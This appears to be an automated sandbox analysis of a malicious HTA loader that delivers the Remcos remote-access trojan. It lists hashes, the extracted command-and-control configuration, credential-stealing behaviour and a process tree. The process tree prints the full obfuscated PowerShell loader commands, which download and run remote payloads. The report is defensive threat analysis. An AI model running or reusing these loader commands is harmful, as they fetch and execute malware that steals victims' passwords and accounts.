Analysis
-
max time kernel
147s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 05:02
Static task
static1
Behavioral task
behavioral1
Sample
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
Resource
win10v2004-20241007-en
General
-
Target
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
-
Size
193KB
-
MD5
012b83177846ce35f8ae1f6b304ff9c6
-
SHA1
ae49e4e85d2fe80a83d0aa6420c72246e8b5e17e
-
SHA256
264fc1a50a0f37a599e8cb50572d99a78c493da4837930a480253e04a5963fa9
-
SHA512
d48bdf9a62e410254cf3074d7215f922e98d6d1ee0c936fff9c3720a000bdc571758e19a5338b7ad76f70b851aac641a7eaba09b92782d5e57e4921e368d2978
-
SSDEEP
96:4owZw9d6yfaqcQ6PHO/3g9a8GPcQ6PHQ0/3g9a8GBGl/Qcj/WqgO7fpR1MK95tio:4LwzQcHgODpqPvQ
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Extracted
remcos
RemoteHost
rmcnewprojectadd.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-QEQMVZ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/4604-101-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3352-100-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1912-102-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3352-100-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1912-102-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 1540 powershell.exe 20 2628 powershell.exe 28 2628 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1540 powershell.exe 4868 cmd.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 2628 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2628 set thread context of 2408 2628 powershell.exe 97 PID 2408 set thread context of 1912 2408 CasPol.exe 99 PID 2408 set thread context of 3352 2408 CasPol.exe 100 PID 2408 set thread context of 4604 2408 CasPol.exe 101 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1632 WScript.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1540 powershell.exe 1540 powershell.exe 2628 powershell.exe 2628 powershell.exe 4604 CasPol.exe 4604 CasPol.exe 1912 CasPol.exe 1912 CasPol.exe 1912 CasPol.exe 1912 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2408 CasPol.exe 2408 CasPol.exe 2408 CasPol.exe 2408 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 4604 CasPol.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 4300 wrote to memory of 4868 4300 mshta.exe 82 PID 4300 wrote to memory of 4868 4300 mshta.exe 82 PID 4300 wrote to memory of 4868 4300 mshta.exe 82 PID 4868 wrote to memory of 1540 4868 cmd.exe 84 PID 4868 wrote to memory of 1540 4868 cmd.exe 84 PID 4868 wrote to memory of 1540 4868 cmd.exe 84 PID 1540 wrote to memory of 3676 1540 powershell.exe 85 PID 1540 wrote to memory of 3676 1540 powershell.exe 85 PID 1540 wrote to memory of 3676 1540 powershell.exe 85 PID 3676 wrote to memory of 1304 3676 csc.exe 86 PID 3676 wrote to memory of 1304 3676 csc.exe 86 PID 3676 wrote to memory of 1304 3676 csc.exe 86 PID 1540 wrote to memory of 1632 1540 powershell.exe 89 PID 1540 wrote to memory of 1632 1540 powershell.exe 89 PID 1540 wrote to memory of 1632 1540 powershell.exe 89 PID 1632 wrote to memory of 2628 1632 WScript.exe 90 PID 1632 wrote to memory of 2628 1632 WScript.exe 90 PID 1632 wrote to memory of 2628 1632 WScript.exe 90 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2628 wrote to memory of 2408 2628 powershell.exe 97 PID 2408 wrote to memory of 1644 2408 CasPol.exe 98 PID 2408 wrote to memory of 1644 2408 CasPol.exe 98 PID 2408 wrote to memory of 1644 2408 CasPol.exe 98 PID 2408 wrote to memory of 1912 2408 CasPol.exe 99 PID 2408 wrote to memory of 1912 2408 CasPol.exe 99 PID 2408 wrote to memory of 1912 2408 CasPol.exe 99 PID 2408 wrote to memory of 1912 2408 CasPol.exe 99 PID 2408 wrote to memory of 3352 2408 CasPol.exe 100 PID 2408 wrote to memory of 3352 2408 CasPol.exe 100 PID 2408 wrote to memory of 3352 2408 CasPol.exe 100 PID 2408 wrote to memory of 3352 2408 CasPol.exe 100 PID 2408 wrote to memory of 4604 2408 CasPol.exe 101 PID 2408 wrote to memory of 4604 2408 CasPol.exe 101 PID 2408 wrote to memory of 4604 2408 CasPol.exe 101 PID 2408 wrote to memory of 4604 2408 CasPol.exe 101
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2yqvkqrf\2yqvkqrf.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C71.tmp" "c:\Users\Admin\AppData\Local\Temp\2yqvkqrf\CSC307546ACF9F84DBDA976283288D360F3.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:1304
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\beqxglfupuuxfnxlfygkdnv"7⤵PID:1644
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\beqxglfupuuxfnxlfygkdnv"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1912
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgviheqwlcmkibtpwjsegaqpgk"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\wajaiobqzkepshhtfunfrflghrytqp"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
19KB
MD531790fb8deddbf04f7be6d987875ed69
SHA19dcc1217735c844ca6bb4e42ba759eb5a1416555
SHA25649f3478dd41fc6dc2c491a5f1dda44f20546b97e61a435504a870e27235eae39
SHA5121a6790ea9fe525b878525e43d4274b540277878657c5c26afc60d64c5191f6d16fa4399b14089eae2558f6e12f44ce96d93e9d1ac349dc9b5d71c24b99cc2d34
-
Filesize
3KB
MD5ca0f5e17b129ae46c6eb146a0407f29b
SHA1edccbd23fedd68c520e5b326b7ad4086dc645d7c
SHA2569484e034d7d898111e8cb266379e314e58b21a658597cf40d81405fde227a643
SHA512faee8e67d69903e927b8c7c3dbb1c86ef7efbeecf06cf429e3565a07a670e484d6e991535ba80e767e7f1b60cc7ec436a5c4e48f77d080942bc63e2905c2e73c
-
Filesize
1KB
MD5dedf9f82c486b90624a2cca6d86ce2a3
SHA13e2ebc8a03b34846568a57e216a8119954ded78a
SHA25611004fdc95a1fdf0a015e3d44982da9c6c81b84334ee02660123b49688003003
SHA512ae34e6f674963208e504b936b0f2bef31fd8449ad68e975de796c7f19b72f7ae30de3ca0799cf3134678c786ce17c3ab2819aba02c2edfb4a0943c50d925dab5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD575379d3dcbcea6a69bc75b884816dd40
SHA17e073a03c3bdbbc60375ddbe56bba211c3d412a6
SHA256cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9
SHA512710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c
-
Filesize
150KB
MD55ce00a79a9f41d260446bfdcc6267adf
SHA10b2b90beb56c59916b98004b1444698538729822
SHA256efab5d21ed82f610bc5f1734b909a7e5c3a6c2ecebb276dd03b4d5baf8e9b058
SHA512d4de7fe61f23ce7524ed3123319ac93f33ae1806bd426045ca9df1fa9ee82cca58aa314711bbde6a6ffa2eee98dc20cc5e4d80d2ec7abb028be0639944714fee
-
Filesize
482B
MD58c16810a9a149ee7b288951c6afdfcd1
SHA14322374e8321e8a97ab6af0b6a23bb3f016c9713
SHA25695c610a9e86321d9dea63594d0d9c9cb72c5dc56edf8f78f25736a76cac0d949
SHA5120e37863619591fdd2cde0ae8ead71ef856695e299e9bb76266f1b40588d3f7e26521f7cb0bedcfa2a0809224dc02b076d4a07a1d247b23adb30e79ca5f626564
-
Filesize
369B
MD52032c617dcacf3c2786faa0f38602898
SHA1cfdd7d37709b9f862c6e8a34cf684a8f217ba81f
SHA2563762e3864ee20fd82353d8d62d06f3162085794ddb198a1d864a24fd131649c8
SHA512eb96c9015ea2db1a285836a7a0ce350f002f0e031bdc2eb0a986e646943da45a5bdc323ef941bea0a98cc047bf46abf8c030c7cccc69c71fd5413e77f8012819
-
Filesize
652B
MD5cd400c9486348d3ada231ae14294901d
SHA1ab08626f48756c6dbe64000b434e8ced60c3eb3d
SHA2561e4706be1e4a81836f240ec30e52136884f1afcbdbf05e9f8d1215304e2299f5
SHA512dcc15456dfcca4bc015cf4a61ec4b82f68f8987b073a8f613e7b6b7032a8dfba08aa727decf393ca67cfdcf35d4b6550a8d114b9436bc7667b199119f8be26b0